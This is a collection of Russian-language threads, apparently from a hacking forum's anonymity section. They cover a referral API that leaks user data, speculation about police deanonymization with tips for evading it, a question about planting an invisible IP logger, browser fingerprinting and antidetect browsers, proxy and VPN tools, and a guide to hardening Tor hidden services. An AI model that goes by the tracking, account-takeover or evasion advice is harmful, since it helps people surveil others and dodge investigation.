Не важно? Представьте, что вы прислали мне свой реферальный код, я получил ваш идентификатор пользователя, подтвержденный адрес электронной почты, имя, фамилию, подтвержденный номер, хэш пароля. Тоесть если у вас лёгкий пароль, то скорее всего можно будет взломать и бабахнуть ваши бабки с баланса. Я знаю что это слишком странно чтобы не данные пользователя, а данные реферала приходили в ответе.

Изображение [3]

Что вам следует делать?
До этого мы писали пользуйтесь разными почтами, паролями, а щас напишем что не пользуйтесь реф ссылками и особенно не делитесь своими.

Изображение [4]

Всегда забавно отправлять сообщения такого рода в службу поддержки, потому что они обычно сходят с ума. Также печально, что они даже не понимают серьезности проблемы. Возможно, я продолжу писать на эту тему, поскольку это кажется забавным.

Поддержите меня:

Spoiler: Кошель

Отпишите в лс

Автор grozdniyandy

Источник https://xss.is/

Простой технический способ деанона. Нужна информация!

ID: 676533bbb4103b69df371a26
Thread ID: 95738
Created: 2023-08-15T16:49:44+0000
Last Post: 2023-08-17T16:12:52+0000
Author: michail
Replies: 12 Views: 630

Подумал так по простейшему способу деанона плохих парней или же пентестеров.
Сдаётся не зря и установили блокирующее оборудование на провайдерах. Всех!
Теперь конкретно, не буду вокруг да около. У майоров для деанона нужно как то связать тёмный и открытый интернет. Без этого им не удаётся установить реальный адрес какого то хакера. Пришла мысль, что это очень легко сделать при помощи установленного у провайдера оборудования.
Первое я опишу саму мысль возможного деанона Технологию. И потом как от этого можно защищаться. Способы, что лично мне пришли на ум. Возможно у вас будут другие.
1. Пусть. Майоры сидят на некоторых сайтах тёмных хакерских, технологий пентеста, вторичных ресурсах, которые нам не ведомы, которые работают исключительно на майоров. И смотрят точное время создания постов, много сайтов показывает присутствие на сайте. Или же просматривает тему пользователь или нет. Эта информация циркулирует исключительно в даркнет - стороне. И вот оборудование у провайдера позволяет совершить анализирование информации. Если это оборудование передаёт хотябы сессию каждого ПК, то дело обстоит плохо. Так как майоры собирают время сессий! Это как моя версия. Кроме того может скидываться майорам ещё и битрейт ПК. Тоже как версия это.
Тем самым, наблюдая за активностью людей в даркнете и соотнося их к "показаниям" оборудования, можно с хорошей точностью указать, какие именно множества из математики, могут соответствовать активности некого отдельного ПК. При малом времени сбора информации множество определение получается гигантское, но при увеличении времени контроля круг IP сужается до нескольких ПК
Очень опасны по сему такие даркнет сайты, где мониторится нахождение на сайте в онлайн. Так как будет чистое палево. Множество очень быстро будет стремиться к единице!
2. Методы защиты от подобного деанона. Моё мнение, оно не обязательно истина, но скорее всего стремится к ней )
а) Очень опасно держать долго свой аккаунт. А лучше удалять и создавать новый примерно держать аккаунт не более 2 - 4-х месяцев. После чего считать, что аккаунт "запачкался".
б) не выключать свой ПК - пусть почти всегда работает. А для защиты от контроля по битрейту врубить торрент клиент например с фильмами, такой средней скачиваемости. Ну и ограничить ему скорость, что-бы он сильно не грузил.
Тем самым майоры не смогут понять. Кто дома и что это вообще было.
В заключение.
Если кто работал в органах или обслуживал оборудование провайдеров прошу очень пишите. Знаю, что таких скорее всего тут не окажется. Но вдруг повезёт? Скорее всего эта информация секретная. Как мне известно, оборудование устанавливаемое у провайдеров это такой большой ящик, напичканый каким то оборудованием. Он опечатывается спец. обслуживающим персоналом. Что это за персонал и какие он имеет сам сведения сейчас мне не известно.
Пишите у кого есть какая информация и что вы думаете. Наверно станут ругаться тут. Но если ничего не известно, то может быть всё что угодно. И по всем правилам нужно думать на самое плохое! А уже дальше "растапливать лёд".
Не думаю, что мои догадки это утопия. К примеру на последнем этапе отсеивания, с вами могут просто затеять переписку по мессенджеру майоры, а затем рубануть на площадке кабель топором. И это будет считаться концом, так как на вопрос ""я доволен могу вам перевести чуть больше $2,5 тыс Устроит? " Ответа уже не последует.

Радиоразведка Европы. Перехват информации. Вадим Гребенников

ID: 676533bbb4103b69df371b17
Thread ID: 66505
Created: 2022-05-03T06:00:57+0000
Last Post: 2022-05-03T06:00:57+0000
Author: camawe
Prefix: Мануал/Книга
Replies: 0 Views: 627

[ Радиоразведка_Европы_Перехват_информации_Вадим_Гребенников.pdf -

AnonFiles ](https://anonfiles.com/R4G899c7yd/_pdf)

anonfiles.com

Как на Mac отключить Wi-Fi, Bluetooth на уровне драйвера.

ID: 676533bbb4103b69df3718eb
Thread ID: 128188
Created: 2024-12-03T23:09:45+0000
Last Post: 2024-12-13T05:24:45+0000
Author: Sponce_bob
Replies: 5 Views: 626

Доброго времени суток! Подскажите, пожалуйста, возможно ли на Mac OS Sequoia 15.1.1 программно отключить Wi-Fi, Bluetooth и службу геолокации на уровне драйвера или каким-либо другим способом? Если да, то как это можно сделать? Основная задача в том чтобы Mac не видел рядом находящиеся устройства apple.

Невидимый IP Logger

ID: 676533bbb4103b69df371b96
Thread ID: 56418
Created: 2021-09-08T11:44:58+0000
Last Post: 2021-10-12T10:56:04+0000
Author: deepblues
Replies: 10 Views: 626

Помогите, пожалуйста, разобраться. Я не понимаю, как использовать невидимый логгер. В описании было сказано, что будет сгенерирована невидимая ссылка, которую можно будет вставить в сообщение на форум. При этом присутствие логгера визуально не определяется, так как он представляет из себя невидимую прозрачную картинку.

Но у меня была сгенерирована обычная ссылка. Я сейчас попробовала её вставить в личное сообщение на форуме (другом) и её видно. Можете объяснить, пожалуйста, что я делаю неправильно?

Блокировка VPN сервисов

ID: 676533bbb4103b69df371a99
Thread ID: 75235
Created: 2022-11-04T14:24:34+0000
Last Post: 2022-11-11T08:24:27+0000
Author: json1c
Replies: 9 Views: 624

Гос хуинистерства хотят заблокировать всё, до чего дотянутся их жалкие ручонки, в том числе и VPN-сервисы, которые им известны (то есть, которыми пользуется большинство людей).

Поисковик по I2P

ID: 676533bbb4103b69df371c61
Thread ID: 46379
Created: 2021-01-05T22:01:58+0000
Last Post: 2021-01-05T22:01:58+0000
Author: rxs77
Replies: 0 Views: 622

Собрал небольшой поисковик по ресурсам в I2P сети.
Если кому нужно будет:
https://shadow.rxs77.net/
Индексация пока еще идет, собралось ~ 20% из 15М ссылкок.

Анонимность и мессенджеры Android

ID: 676533bbb4103b69df371a87
Thread ID: 79031
Created: 2022-12-30T18:12:30+0000
Last Post: 2023-02-01T18:41:24+0000
Author: kirnovik
Replies: 15 Views: 622

Доброго времени суток и с наступающим всех!

Интересует вопрос анонимности в использовании мессенджеров на Android, в первую очередь интересует Jabber и Briar
Будет ли достаточно Pixel на GrapheneOS/CalyxOS с фаерволом и VPN?
Или добавить OpenWRT VPN-TOR?

Спасибо

Что такое отпечаток браузера

ID: 676533bbb4103b69df371b54
Thread ID: 61319
Created: 2022-01-13T11:45:15+0000
Last Post: 2022-01-26T13:54:34+0000
Author: AYanny
Replies: 3 Views: 620

Что такое отпечаток браузера

Отпечатком браузера (browser fingerprint, иногда на русском тоже говорят слово «фингерпринт») обычно называют совокупность данных, которые сайт может получить о вашем компьютере и браузере, запросив эту информацию при загрузке веб-страницы. В отпечаток браузера входят десятки разных параметров — от языка, который вы используете, и временной зоны, в которой находитесь, до списка расширений и версии вашего браузера. Сюда же может входить информация об операционной системе, об объеме оперативной памяти, разрешении экрана устройства, параметрах шрифтов и многом другом.

Различные сайты собирают разное количество этой информации. На ее основе они потом генерируют ваш уникальный идентификатор — отпечаток браузера, по которому будут определять, что это именно вы. При этом отпечаток браузера — это не куки (cookies), хотя их и можно использовать похожим образом. Но если на использование cookies вы должны дать согласие (наверняка вы уже замучились закрывать различные всплывающие уведомления «Наш сайт использует cookies»), то на снятие вашего отпечатка браузера никакого согласия формально вроде как не требуется.

Более того, от снятия отпечатка браузера не спасает и режим «Инкогнито», поскольку почти все параметры браузера и устройства остаются прежними и по ним можно идентифицировать, что вы — это вы.

Для каких целей определяется отпечаток браузера

Владельцы сайтов собирают отпечатки браузеров своих посетителей для:

безопасной аутентификации,

сбора исчерпывающей информации о гостях сайтов,

показов целевой рекламы,

идентификации анонимных незарегистрированных посетителей,

для внутренней аналитики и улучшения юзабилити веб-ресурса.

На сегодняшний день в мире насчитывается более 4 миллиардов Интернет- абонентов. К идентифицированному пользователю привязывается информация о его интересах, хобби, предпочтениях и прочие данные, чтобы создавать индивидуальные рекламные компании, нацеленные на потребности конкретного человека, предлагать интересующие товары, информационные статьи и видеоматериалы.

Не исключено, что базы данных отпечатков браузера продаются или ими делятся. При этом пользователи никак не могут препятствовать сбору и накопление таких цифровых данных или влиять на их использование.

Эксперты по безопасности расценивают несанкционированный сбор отпечатков браузера как нарушение конфиденциальности. Идентификация Интернет-пользователя без его ведома и согласия подрывает основополагающий принцип всемирной сети – анонимность, дающий ощущение свободы и безопасности.

Запретить или ограничить сбор отпечатков браузера практически невозможно. Если вы хотите, чтобы никто не смог идентифицировать ваш фингерпринт не пользуйтесь Интернетом.

Как скрыть отпечаток браузера

Чтобы скрыть отпечаток браузера, модифицируйте его корректируя параметры операционной системы или изменяя настройки компьютера. Любые перемены повлияют на fingerprint.

С целью изменить отпечаток браузера вручную поменяйте одну или несколько следующих настроек:

использовать другой user-agent,

установить или удалить плагины и расширения,

задать другое разрешение экрана монитора,

изменить масштабирование веб-страниц,

заменить предпочитаемые шрифты,

выбрать иной часовой пояс в настройках Windows,

сменить операционную систему и системный язык интерфейса,

поменять конфигурацию браузера,

отключить геолокацию (определение местоположения),

создать новый профиль пользователя.

После модифицирования, проверьте поменялся ли отпечаток браузера с помощью Интернет-сервисов.

Смена IP адреса не поможет скрыть (изменить) отпечаток браузера. С другой стороны, многие люди имеют стандартные настройки браузеров по умолчанию, не меняющиеся годами. Специфические параметры, наоборот, выделяют компьютер из общей массы. Как вариант, можно затеряться среди идентичных сотен тысяч одинаковых отпечатков браузеров.

Подмена отпечатка браузера

Антидетект-браузер осуществляет подмену отпечатка браузера, что позволяет работать с множеством аккаунтов. Эти программы платные с ежемесячной подпиской в среднем 25 — 100 долларов США. В зависимости от тарифа, предлагается набор отпечатков браузера. Здесь рекомендую хороший и дешевый антидетект-браузер — AdsPower. Это антидетект-браузер от разработчиков из Гонконга. Он предназначен для управления мультиаккаунтами на разных платформах. Сервис предоставляет браузерные профили и дает возможность настраивать браузерные отпечатки для каждого из них. В AdsPower представлены инструменты Local API и RPA-робот, позволяющие автоматизировать действия в Facebook.

Luxsocks алтернативы?

ID: 676533bbb4103b69df371b57
Thread ID: 61796
Created: 2022-01-22T06:10:25+0000
Last Post: 2022-01-22T23:09:54+0000
Author: Kolyska_official
Replies: 2 Views: 620

Сабж есть ли что то?

Бесплатные серверы Shadowsocks для обхода цензуры личный опыт

ID: 676533bbb4103b69df371a12
Thread ID: 96168
Created: 2023-08-21T02:52:42+0000
Last Post: 2023-09-03T16:21:16+0000
Author: ktpm23
Prefix: Статья
Replies: 9 Views: 619

Shadowsocks (сокращенно SS) – это прокси-протокол, предназначенный для обхода цензуры, обеспечивая безопасное и приватное интернет-соединение. Этот инструмент позволяет пользователям обмениваться данными с использованием зашифрованных каналов, что делает его одним из самых популярных средств для обхода цензуры и защиты данных в странах, где интернет-свобода ограничена.

Shadowsocks работает на следующих системах:
Unix-подобные операционные системы
Microsoft Windows
Android
iOS

Для использования Shadowsocks можно загрузить клиентскую программу с официального сайта разработчика на GitHub (https://github.com/shadowsocks).
Здесь можно найти последнюю версию программы и загрузить ее для установки на свое устройство.

Чтобы использовать Shadowsocks пропишите DNS-сервер на своем гаджете, не относящиеся к вашему интернет-провайдеру.

Это поможет защитить вашу конфиденциальность и избежать блокировки некоторых сайтов. Вы можете использовать публичные серверы DNS, такие как Google DNS (8.8.8.8 и 8.8.4.4) или Cloudflare (1.1.1.1 и 1.0.0.1). О том, как изменить DNS-сервер можно почитать подробно тут (<https://lifehacker.ru/nastrojka-dns- servera/>)

**Однако только клиентская программа недостаточна для использования Shadowsocks. Потребуется сервер, который будет проксировать трафик через Shadowsocks.

Бесплатные серверы Shadowsocks имеют преимущества и недостатки:**

1. Они позволяют получить доступ к заблокированному контенту, изменить виртуальное расположение чтобы обойти интернет-цензуру.

2. Надежность и скорость ограничены. Они обычно имеют ограниченную пропускную способность, поэтому не рекомендуется использовать их для скачивания больших файлов.

3. Эти серверы не всегда анонимные, заметно что это VPN поэтому некоторые сайты и провайдеры могут их блокировать.

4. Далеко не всегда есть нужные аккаунты либо они быстро умирают.

Создание бесплатного аккаунта для VPN.

Чтобы создать учетную запись, нажмите на флаг страны, чей сервер вам нужен. Посмотрите, сколько осталось учетных записей и до какого числа они действительны. Затем нажмите «Create Account». Появится QR-код. (на сайтах часто разный интерфейс, но принцип действий примерно всегда такой).

Включите программу Shadowsocks и щелкните правой кнопкой мыши по свернутой в трей программе. Наведите на пункт «Серверы» и щелкните галочку около пункта «Сканировать QR-код с экрана». Если вы хотите использовать прокси, наведите курсор мыши на «Системный прокси-сервер» и поставьте галочку напротив пункта «Для всей системы».

**Бесплатные сервера можно найти через поиск гугл по запросу «Free List Shadowsocks Server» или на этих веб-сайтах:

1. SSHStores (https://sshstores.net/shadowsocks): **Этот сайт предлагает бесплатные VPN серверы для Wireguard, Shadowsocks, Open VPN, V2ray Vless, V2ray Vmess.

Здесь много серверов, из которых можно выбрать, что позволяет получить доступ к контенту, обычно блокируемому в регионе.

Обычно сервер живет семь дней, после чего его необходимо обновить на новый.

2. RaceVPN (https://www.racevpn.com/free-shadowsocks-server): это сайт, который предлагает бесплатные VPN-серверы из разных стран. На сайте доступны серверы для следующих протоколов: Pptp, L2tp, Outline, OpenVPN, Trojan, Openssh, V2ray, Shadowsocks, Vmess, websocket, Vmess mKCP, Vless websocket, Vless mKCP.

Скорость серверов RaceVPN невысока, а некоторые сервисы могут легко определить, что вы пользуетесь VPN. Однако серверы RaceVPN достаточно долговечны и могут быть использованы для доступа к заблокированному контенту.

3. SSHMax (https://sshmax.net/create/shadowsocks): Этот это сайт, который предлагает создание бесплатных серверов SSH, OpenVPN, Shadowsocks, TrojanVPN и V2Ray VMESS.

На сайте доступны серверы из разных стран, что позволяет выбрать сервер с оптимальной скоростью и задержкой.

Бесплатные серверы SSHMax имеют некоторые ограничения по скорости и длительности работы примерно 13 дней.

автор ktpm23
источник xss.is

Вопрос, VPN/VLESS

ID: 676533bbb4103b69df37196c
Thread ID: 114722
Created: 2024-05-17T03:46:55+0000
Last Post: 2024-05-18T13:19:32+0000
Author: AlwaysP
Replies: 4 Views: 619

Использую VLESS на хосте
При подключении по SSH/RDP к VDS на самих VDS логируетач мой реальный IP
Подскажите? Не с того интерфейса обращается?

Анонимность и сервис donationalerts

ID: 676533bbb4103b69df371ca5
Thread ID: 41750
Created: 2020-09-04T10:11:03+0000
Last Post: 2020-09-04T10:34:21+0000
Author: negg
Replies: 3 Views: 616

Есть некий популярный сервис в рашке,donation alerts. Стало интересно.
Давайте представим ситуацию. Допустим я оппозиционер. У меня есть свой аккаунт в donation alerts. Допустим я провожу стримы,и вы донатите мне через этот сервис. Вопрос,менты ведь с легкостью могут получить данные!? Особенно когда этот сервис принадлежит компании mail ru... Все ваши транзакции будут переданы ментам. И потом они с легкостью расшифруют все. Все ведь так?

Securing a Web Hidden Service

ID: 676533bbb4103b69df371a48
Thread ID: 91180
Created: 2023-06-23T10:22:19+0000
Last Post: 2023-07-02T08:07:11+0000
Author: whyban
Prefix: Статья
Replies: 1 Views: 613

First off, the webserver never should have responded to HTTP requests on the server's IP address. Only traffic which comes through the Tor hidden service, which connects to the webserver's port 80 on the loopback interface, should have been allowed. Some iptables rules would have sufficed:

iptables -A INPUT -i eth0 -p tcp --dport 80 -j DROP
iptables -A INPUT -i lo -p tcp --dport 80 -j ACCEPT

Click to expand...

In addition Apache itself should listen for connections on localhost (127.0.0.1) only, not * or 0.0.0.0. This is controlled in the VirtualHost definition, or the Listen directive of ports.conf:

Listen 127.0.0.1:80

Click to expand...

Secondly, here's an example script that you can put in a nightly cron job, which will create an .htaccess file for Apache that will allow traffic from known Tor exit nodes only, and deny everything else. You'll have to set the two variables for the Document Root and the server's IPv4 address.

#!/bin/bash
docroot=/var/www/htdocs
ipaddress=0.0.0.0
sed -in '/#\ TOR-ALLOW-BLOCK/,/#\ END-TOR-ALLOW-BLOCK/d' $docroot/.htaccess
wget -q 'https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip='"$ipaddress"'&port=80' -O - | sed '/^\#/d' | sed "s/^/Allow from /g; 1i# TOR-REDIRECT-BLOCK" >> $docroot/.htaccess

Click to expand...

You also need to create the .htaccess file first and populate it with these lines:

Order Deny,Allow
Deny from all

TOR-ALLOW-BLOCK

END-TOR-ALLOW-BLOCK

Click to expand...

Make sure your Tor software is updated

It is not enough to simply install Tor and configure your onion service and then forget about it. You must keep it up to date so that critical security flaws are fixed. All software has bugs, and Tor is no exception. Make sure you are keeping your software up-to-date.

Many things can be made into onion services

You can do a lot of things over onion services, not just make a website available! You can also provide IMAP, or SMTP, or [deliver mail between MTAs](https://www.void.gr/kargig/blog/2014/05/10/smtp-over-hidden-services- with-postfix/), among many other possibilities. Spread the onions far and wide! But be careful, if the service makes DNS request for whatever reason (like resolving where that SMTP server is to send the email), then you leak information. One way to work around this is to have the machine running your service fully iptabled to go through Tor all the time.

Don’t run a relay at the same time

Do not run a relay and an onion service on the same instance. Having a relay and an onion service on same IP and/or machine helps traffic correlation and fingerprinting. However, Tor is smart enough to not choose itself as a node for the circuit so it’s not a disaster but ideally you want to avoid it.

Monitor your onion service(s) availability

Although their stability has improved greatly, onion services can still fail for a number of reasons. Set up some monitoring to regularly connect to your onion service(s) to make sure that they are still functioning.

Multiple ports for one onion service

You don’t need to create a different onion service for every service you want to make available, just add more HiddenServicePort lines, for example:

HiddenServiceDir /usr/local/etc/tor/other_hidden_service/
HiddenServicePort 6667 127.0.0.1:6667
HiddenServicePort 22 127.0.0.1:22

Click to expand...

If you want to run multiple onion services from the same Tor client, just add another HiddenServiceDir line to the config file.

SSL/TLS isn’t necessary

You don’t really need SSL/TLS in an onion address (ie. https) since it’s a complete encrypted tunnel + PFS (perfect forward secrecy), but it does not hurt having extra layers in that onion!

Although it is true that extra layers are good beware that usually redirecting to SSL/TLS will mean that the certificate will not validate (because the hostname will be *.onion, instead of the certificate that you have for your public service). If you can get a .onion certificate, that works!

If your onion service does use TLS, make sure that it does not send a certificate for an external website.

Onion services and Rails 4

In order to get a .onion site to play nice with rails, and have the site also work over HTTPS when not using the .onion, you need change a few defaults.

The first thing that must be changed is to not use the config.force_ssl = true option. This option is the default for rails apps in production. This setting forces secure cookies and forces HSTS. Change my_rails_app/config/environments/production.rb to be:

config.force_ssl = false

Click to expand...

Once we set force_ssl = false, we want to add back the ability to enforce secure cookies and HSTS when using normal HTTPS. So, to do this, we make sure the web server is setting the HSTS headers for the HTTPS virtualhost, and we add the secureheaders gem to enforce secure cookies. The secureheaders gem will set the Secure cookie flag only for HTTPS connections, unlike the rails force_ssl flag. This allows use to have secure cookies for the regular HTTPS site and insecure cookies for the .onion site, which is what we want.

Install the secureheaders gem for your application, in my_rails_app/Gemfile:

gem 'secure_headers', '~> 3.5'

Click to expand...

(replace 3.5 with whatever the current version of secureheaders is available)

Add a secureheaders configuration, in config/initializers/secureheaders.rb :

SecureHeaders::Configuration.default do |config|
config.cookies = {
secure: true,
httponly: true,
samesite: {
strict: true
}
}
end

Click to expand...

NOTE: When configuring apache or nginx in this setup, do not set the X_FORWARDED_PROTO environment variable to be https on the port 80 onion virtual host. You should set it on the port :443 non-onion virtual hosts.

Leaking the real server

A common misstep here is server signatures, for example it is easy to determine if a webserver is thttpd or Apache, or learn about your operating system because the banner tells the version of the running service and operating system.

Another way that your onion address will get out is via the referrer header in browsers when a client browses a hidden service website and then clicks on a clearnet/hidden service link. The Tor browser has taken care of many of these tiny leaks, so be sure to encourage your users to use an up-to-date tor browser instead of using their own browser with Tor.

If the server running the onion service is also exposed to the clearnet, make sure that when you connect to either the clearnet service or the onion service, you cannot specify in the host header the other service and get a response. You should ensure the onion service is only listening on the internal IP and your external service is only listening on the external IP address. The easiest way to ensure there are no failures here is this is to run your service on a machine that has no external IP address.

Make sure the time on your server is correct, and is corrected automatically by NTP, so that time skews do not help identify your server.

Make sure you are not inadvertently exposing information, for example with PHP you may disclose the server’s real name/address if you leak phpinfo() or $_SERVER, or expose error messages!

Look into protecting yourself against Server Side Request Forgery (SSRF). This attack works by getting the server to perform an external connection (DNS lookup, etc.) which can expose your machine’s real location. Strict egress firewalling is one way to mitigate against this problem.

The longer an onion service is online, the higher the risk that its location is discovered. The most prominent attacks are building a profile of the onion service’s availability and matching induced traffic patterns.

There are currently ways in the protocol that a bad relay can learn about your onion address, even if you don’t tell anybody. Follow the discussion on the subject if you want to stay on top of how the Tor project is working on fixing these issues.

OnionScan

Use the [OnionScan→onionscan.org] tool to scan HTTP onion services to look for leaks. It will look for IP addresses, EXIF metadata in images, and things like enabled mod_status that can leak the real IP address of the server.

Onion services don’t need to be hidden!

You can provide a onion service for a service that you offer publically on a server that is not intended to be hidden. Onion services are useful to protect users from passive network surveillance, they keep the snoopers from knowing where users are connecting from and to.

Make your onion services easy to find

If you provide onion services, make them known to your users by advertising their existance, their onion hostnames and ports that they provide in a way that authenticates they are the ones that are legitimate (for example, you could digitially sign the list of onion addresses like [Riseup does](https://riseup.net/en/security/network-security/tor#riseups-tor-hidden- services), or put them in DNS txt records).

Ask your favorite online service to provide an onion service!

Advocate for more onion services by asking those who provide the services that you use to make them available. They are easy to setup and maintain, and there is no reason not to provide them!

Moving onion services

You can move onion services between systems, just copy the /var/lib/tor/ <hidden_service> directory to the new system and make sure the torrc on the new system has the same configuration as the old one. Be sure to disable and stop the old one before starting the new one. The onion service directory simply contains the hostname of the onion service, and the private key.

Protecting your services

Protect your private keys

Keep the onion service private key private! That key should not be available to the public, it should not be shared and it should have proper permissions set so it is not readable by anyone on your system, except for the Tor process.

Backup your private keys

If you plan to keep your service available for a long time, you might want to make a backup copy of the private_key file somewhere safe

Be careful of localhost bypasses!

You should take very careful care to not accidentally expose things on your server that are restricted to the local machine. For example, if you provide /server-status in apache (from mod_status which is enabled per default in debian’s apache) to monitor the health of your apache webserver, that will typically be restricted to only allow access from 127.0.0.1, or you may have .htaccess rules that only allow localhost, etc.

There are a few ways you can solve this problem:

different machine : consider running the onion service on a different machine (real or virtual) than the actual service. This has the advantage that you can isolate the service from the onion service (a compromise of one doesn’t compromise the other) and helps with isolating potential information leaks

isolation : similarly to the above, you can also isolate Tor and the service so it will run on a different network namespace than the service. Tails uses a Tor-or-fail packet filter.

public ip : configure the onion service to connect to the public IP address of the service instead of localhost/127.0.0.1, this should make Tor not pick 127.0.0.1 as the source address and avoid most misconfigurations. For example like this

HiddenServiceDir /var/lib/tor/hidden/ftp/
HiddenServicePort 80 192.168.1.1:81

Click to expand...

Note: This makes your server and vhost potentially reachable to an external entity. There has been a growing number of attempts to discover the true location of sites behind cloudflare that are badly configured because they still expose their true httpd on a public IP address. People regularly use masscan and zmap to scan the entire ipv4 address space and try to connect to a publicly exposed httpd and request “high-value” onion addresses from the httpd to see if they send a Host header and make the site serve their probed vhosts content.

Binding to a port that is different from the “true” port is a source of a potential leak on Apache. If there is a directory, e.g. foo.onion/css/ then a request to foo.onion/css will cause apache to emit a 301 redirect, but when it does issue it, it will include the port that it thinks the service is listening on. Instead of sending a 301 to foo.onion/css/ it would send a 301 for foo.onion:81/css/ this both breaks the website and reveals the port the httpd is really running on.

unix socket : consider using unix socket support instead of a TCP socket (requires 0.26 or later Tor) – if you do this, then the onion service will be running on the same server as the service itself. With a socket approach, you should be able to run with privatenetwork=yes in systemd unit which gets you some really great isolation, for example:

HiddenServicePort 80 unix:/etc/lighttpd/unix.sock

Click to expand...

But then the service itself needs to support unix sockets, otherwise you have to setup some socat redirection from tcp <→ unix (nginx, twisted, lighttpd all support this).

audit carefully : carefully audit, and regularly re-audit your system for configurations that allow localhost/127.0.0.1, but prohibit everywhere else and configure those to work around the problem (for example make /server- status operate on a different IP; make the webserver listen on a different port for /server-status; make it password protected, etc.).

.
I hope you comply and do not leak

Решения для анонимности и безопасности

ID: 676533bbb4103b69df371b8d
Thread ID: 57880
Created: 2021-10-18T20:24:49+0000
Last Post: 2021-10-21T21:42:14+0000
Author: dr.shadow
Replies: 10 Views: 613

Камрады приветствую
В общем то можете посоветовать какие нибудь нестандартные решения для анонимности, впрочем tor, vpn мне не совсем подходит потому как на фоне других пользователей я буду выделятся и буду вызавыть вопросы, например что я там хочу такое скрыть что так часто использую из выше перечисленного.

Так сложилось что в данный момент живу на земном шаре в точке где сейчас всё не стабильно и за это ваша личность вызывает вопросы за использование подобных решений.

Я ещё раньше слышал за такую прогу которая на фоне генерируют легитимный трафик, как думаете если использовать данное решение с тором?, но и всё равно у меня есть сомнения, вот как бы сделать так например что-бы я у провайдера был просто тип подключён к серверам гугла тогда бы это не вызывало бы никаких вопросов.

На данный момент я вижу выход только свалить с такой страны, но к большому сожалению я не могу пока этого сделать?

Спасибо.

Где купить мобильные прокси за биткойн?

ID: 676533bbb4103b69df371c99
Thread ID: 42465
Created: 2020-09-24T23:53:53+0000
Last Post: 2020-09-25T00:35:05+0000
Author: Evilxxx
Replies: 2 Views: 612

Хочу купить мобильные прокси. Что-то вроде аирсокс
Знаете сервисы которые принимюат оплату криптой?

Xray на Keenetic / Xkeen

ID: 676533bbb4103b69df3719f2
Thread ID: 97778
Created: 2023-09-10T21:13:05+0000
Last Post: 2023-10-27T10:47:25+0000
Author: baykal
Prefix: Статья
Replies: 2 Views: 611

Всем доброго времени суток!
Предлагаю утилиту для поддержки Xray на роутерах Keenetic — Xkeen. Весь код написан на чистом shell и открыт на GitHub.

Что такое Xray
Xray / v2ray — очень гибкая утилита для проксирования и защиты соединения, созданная для обхода GFW (Китайского Файрвола).
С помощью нее возможно обойти даже блокировки Ирана. Полагаю, что в РФ этого решения хватит на приличное время.

Решение не будет работать без глубокой настройки в Туркменистане

Решение не будет работать в КНДР.
Там нет интернета в привычном нам понимании

Решение используется не только для обхода блокировок, но и защиты соединения

Основные возможности Xray

Выборочная работа с DNS по современным протоколам

DNS over TLS

DNS over HTTPS

DNS over Quic

Создание собственного DNS — FakeDNS

Поддержка обратного проксирования — Reverse Proxy

Настройка политик для разных пользователей

Маршрутизация поддерживающая

Geoip

Geosite — то же самое, что и Geoip, но с доменами.

Регулярные выражения

CIDR

Точные совпадения

Частичные совпадения

Поддомены

Сегментация по правилам и управление входящим трафиком по протоколам

Dokodemo-door

HTTP

ShadowSocks

Socks

Trojan

VLESS

VMess

Сегментация по правилам и управление исходящим трафиком по протоколам

Blackhole

DNS

Freedom

HTTP

ShadowSocks

Socks

Trojan

VLESS

VMess

Wireguard

Использование современных транспортных протоколов

gRPC

HTTP.2

mKCP

Quic

TCP

Websocket

Обеспечение защиты транспорта

Основные возможности Xkeen
Автоматическая сборка актуальной версии Xray под Ваш Keenetic.
Тестировался на aarch64 , но гипотетически должен работать и на mips , **mipsel.

Автоматические обновления**
Включаются по желанию с возможностью гибкой настройки времени обновления

Xkeen

Xray

GeoSite

GeoIP

В утилиту интегрированы
Включаются по желанию

GeoSite

v2fly

AntiFilter

AntiZapret

GeoIP

v2fly

AntiFilter

Ключи запуска Xkeen

Spoiler: Ключи для запуска

Пример использования ключей запуска: «xkeen -x», где «-x» — выбранный Вами ключ.

Полный цикл установки
-i — Необходимые пакеты, Xray и сервисы Xkeen

Обновление
-ux — Xray
-uk — Xkeen
-ugs — GeoSite
-ugi — GeoIP

Включение или изменение правил обновления
-uac — Xray, Xkeen, GeoSite, GeoIP
-uxc — Xray
-ukc — Xkeen
-ugsc — GeoSite
-ugic — GeoIP

Регистрация
-rx — Xray
-rk — Xkeen
-ri — Автоматический запуск Xray средствами init

Удаление / Автоматические обновления
-dac — Xray, Xkeen, GeoSite, GeoIP
-dxc — Xray
-dkc — Xkeen
-dgsc — GeoSite
-dgic — GeoIP

Удаление / Утилиты и компоненты
-dx — Xray
-dk — Xkeen
-dgs — GeoSite
-dgi — GeoIP
-dс — Конфигурации Xray
-dt — Временные файлы

Удаление / Регистрации
-drx — Xray
-drk — Xkeen

Обновление регистрации утилит
-rrx — Xray
-rrk — Xkeen

Переустановка
-x — Xray
-k — Xkeen
-rc — Конфигурационные файлы Xray

Резервные копии / Создание
-xb — Xray
-kb — Xkeen
-cb — Конфигурационные файлов Xray

Резервные копии / Восстановление последней
-xbr — Xray
-kbr — Xkeen
-cbr — Конфигурационные файлы Xray

Проверки
-tpc — Соединение
-tpx — Порты Xray
-tfx — Файлы Xray
-tfk — Файлы Xkeen
-v — Версия Xkeen

Управление Xray
-start — Запуск Xray
-stop — Остановить Xray
-restart — Перезапустить Xray
-status — Показать текущий статус работы Xray

Автор
-ad — Если Вам полезна утилита, можете купить Мне кофе
-af — Обратная связь

Способ установки

Code:Copy to clipboard

opkg install curl tar curl -s -L https://github.com/Skrill0/XKeen/releases/latest/download/xkeen.tar --output xkeen.tar && tar -xvf xkeen.tar -C /opt/sbin --overwrite > /dev/null && rm xkeen.tar xkeen -i

Выбираем интересующие Вас GeoIP и GeoSite.
Можно установить все сразу.

Устанавливаем время автоматического обновления.

Готово. Вы великолепны.
Можете настраивать конфигурации Xray под свои нужды.
Конфигурационные файлы находятся по пути /opt/etc/xray/configs/
Некоторые имеют детальное описание. Его можно удалить.

Spoiler: Полезные ссылки для настройки

GitHub репозиторий Xray
Чат X project в telegram — можно спросить друзей-китайцев.
Рекомендую писать на английском.

[Быстрый старт от XTLS-Team](https://xtls.github.io/en/document/#download- and-install)
Базовое руководство от XTLS-Team
Продвинутое руководство от XTLS- Team

Быстрая настройка сервера на VPS
Минималистичная, но более сложная настройка сервера на VPS

Базовый разбор технологий и протоколов

Образцы конфигураций

https://github.com/XTLS/Xray-examples

https://github.com/chika0801/Xray-examples

https://github.com/lxhao61/integrated-examples

Spoiler: Полезные категории GeoSite

В GeoSite v2fly нет зоны Ru.

